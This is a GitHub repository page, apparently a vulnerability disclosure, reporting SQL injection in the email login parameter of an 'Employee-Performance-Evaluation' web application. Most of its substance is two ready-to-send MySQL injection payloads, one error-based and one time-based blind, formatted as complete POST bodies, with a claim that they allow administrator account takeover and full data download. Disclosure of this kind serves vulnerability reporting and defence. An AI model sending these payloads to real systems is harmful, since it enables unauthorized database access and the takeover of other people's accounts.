Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-nu11secur1ty/vendors/oretnom23/2022/Employee-Performance-Evaluation/
CVE-nu11secur1ty/vendors/oretnom23/2022/Employee-Performance-Evaluation/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

Employee-Performance-Evaluation

Vendor

Description:

The email parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the email parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.

Status: CRITICAL

[+] Payloads:

---
Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: email=YgGZcTAx@sourcecodester.com' AND (SELECT 6536 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(6536=6536,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- iQpA&password=hacked&login=0

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=YgGZcTAx@sourcecodester.com' AND (SELECT 2365 FROM (SELECT(SLEEP(5)))lFkz)-- xqup&password=hacked&login=0
---

Reproduce:

href

More info:

href